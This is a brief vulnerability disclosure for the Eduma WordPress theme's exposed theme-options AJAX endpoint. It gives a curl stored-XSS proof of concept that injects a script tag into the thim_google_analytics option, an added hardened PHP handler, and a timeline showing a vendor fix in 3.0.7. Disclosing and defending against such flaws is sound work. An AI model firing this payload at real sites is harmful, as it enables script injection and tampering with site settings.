Education WP 3.0.6.1, aka Eduma, suffers from a somewhat common issue: an exposed theme options endpoint.

Avada basically had the same type of issue, and most WordPress theme and plugin issues boil down to an option or setting.

The POC is pretty simple: it updates one of the theme options, called thim_google_analytics.

Of course, when all of the options or settings are exposed, there are other things that can be done, like changing a PayPal address etc., so it is pretty dangerous.

Stored XSS POC

curl -D- 'http://127.0.0.1/wp-admin/admin-ajax.php' --data "action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=XXXX</script><script>alert(1337)</script><scrtipt>"  
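
For comparison, a hardened handler for an option-update AJAX action of this kind, as an added example (not Eduma's code and not the vendor's 3.0.7 fix). The function names, the nonce action, the allowlist and the assumption that thim_google_analytics holds a `UA-` style tracking ID are hypothetical; the WordPress functions are core APIs.

```php
<?php
// Added example: hypothetical handler, not taken from the Eduma theme.

// Register on wp_ajax_ only. A wp_ajax_nopriv_ registration of the same
// callback would let anonymous visitors reach it through admin-ajax.php.
add_action( 'wp_ajax_thim_update_theme_mods', 'example_update_theme_mods' );

function example_update_theme_mods() {
	// 1. Authorization: only users who may edit theme options.
	if ( ! current_user_can( 'edit_theme_options' ) ) {
		wp_send_json_error( 'forbidden', 403 );
	}

	// 2. CSRF protection: 'example_theme_mods' is a hypothetical nonce action.
	//    check_ajax_referer() terminates the request when the nonce is invalid.
	check_ajax_referer( 'example_theme_mods', 'nonce' );

	$key   = isset( $_POST['thim_key'] ) ? sanitize_key( wp_unslash( $_POST['thim_key'] ) ) : '';
	$value = isset( $_POST['thim_value'] ) ? sanitize_text_field( wp_unslash( $_POST['thim_value'] ) ) : '';

	// 3. Allowlist: each writable option has its own validator, so the
	//    endpoint cannot be used to overwrite arbitrary theme settings.
	//    Assumption: this option stores a Google Analytics "UA-" property ID.
	$validators = array(
		'thim_google_analytics' => '/^UA-\d{4,10}-\d{1,4}$/',
	);

	if ( ! isset( $validators[ $key ] ) || ! preg_match( $validators[ $key ], $value ) ) {
		wp_send_json_error( 'invalid option or value', 400 );
	}

	set_theme_mod( $key, $value );
	wp_send_json_success();
}

// Output side: escape for the JavaScript context even though the stored
// value was validated, so a bad value from an older version stays inert.
function example_print_analytics_id() {
	echo esc_js( get_theme_mod( 'thim_google_analytics', '' ) );
}
```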

Timeline

23 - 04 - 2017 - Vulnerability discovered  
23 - 04 - 2017 - Vendor notified  
27 - 04 - 2017 - Vendor fixed the issues in 3.0.7  
08 - 05 - 2017 - Vulnerability goes public.